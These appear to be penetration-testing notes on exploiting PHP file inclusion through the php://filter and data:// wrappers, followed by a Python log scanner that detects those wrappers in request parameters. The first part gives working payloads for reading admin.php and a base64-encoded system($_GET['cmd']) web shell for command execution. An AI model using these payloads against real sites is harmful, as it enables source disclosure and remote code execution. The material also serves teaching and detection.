PHP Filters
php://filter
We can use the php://filter wrapper to display the contents of files, either with or without encodings like ROT13 or Base64.
curl http://127.0.0.1/index.php?page=php://filter/resource=admin.php
Encode the output with Base64 by adding the convert.base64-encode filter. This converts the specified resource to a Base64 string.
/index.php?page=php://filter/convert.base64-encode/resource=admin.php
data://
We can use the data:// wrapper to achieve code execution. This wrapper is used to embed data elements as plaintext or base64-encoded data in the running web application's code. This offers an alternative method when we cannot poison a local file with PHP code.
/index.php?page=data://text/plain,<?php echo system('ls');?>
kali@kali:~$ echo -n '<?php echo system($_GET["cmd"]);?>' | base64
PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==
/index.php?page=data://text/plain;base64,PD9waHAgZWNobyBzeXN0ZW0oJF9HRVRbImNtZCJdKTs/Pg==&cmd=ls
We need to be aware that the data:// wrapper will not work in a default PHP installation. To exploit it, the allow_url_include setting needs to be enabled.
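Both wrappers leave a recognizable trace in the request's query string. The following is an added example, not part of the original notes: it scans web access-log lines for php://filter and data:// values in any parameter, undoing percent-encoding first. The function names, the combined log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote

REQUEST_RE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
# Case-insensitive; "data:" also covers the "data://" form used on this page.
WRAPPER_RE = re.compile(r"\s*(php://filter|data:)(.*)", re.IGNORECASE | re.DOTALL)

def decode_fully(value, rounds=3):
    """Undo up to `rounds` layers of percent-encoding."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_line(line):
    """Return (parameter, wrapper, detail) tuples for one access-log line."""
    request = REQUEST_RE.search(line)
    if not request:
        return []
    findings = []
    for pair in urlsplit(request.group(1)).query.split("&"):
        name, _, raw = pair.partition("=")
        hit = WRAPPER_RE.match(decode_fully(raw))
        if not hit:
            continue
        wrapper, rest = hit.group(1).lower(), hit.group(2)
        if wrapper == "php://filter":
            # Everything after "resource=" is the file being read.
            detail = "resource=" + rest.partition("resource=")[2]
        else:
            # ";base64" before the first comma marks an encoded body.
            header = rest.partition(",")[0].lower()
            detail = "base64 body" if ";base64" in header else "plaintext body"
        findings.append((name, wrapper, detail))
    return findings

# Constructed sample log lines (combined log format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=about.php HTTP/1.1" 200 812',
    '203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?page=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3Dadmin.php HTTP/1.1" 200 1432',
    '203.0.113.5 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?page=data://text/plain;base64,aGVsbG8=&cmd=ls HTTP/1.1" 200 512',
    '203.0.113.5 - - [01/Jan/2024:10:00:12 +0000] "GET /index.php?page=data%253A%252F%252Ftext%252Fplain%2Chello HTTP/1.1" 200 512',
]

def scan_log(lines):
    return [finding for line in lines for finding in scan_line(line)]
```

A hit on data:// only matters for code execution when allow_url_include is enabled, so pair the alert with a check of that setting on the affected host.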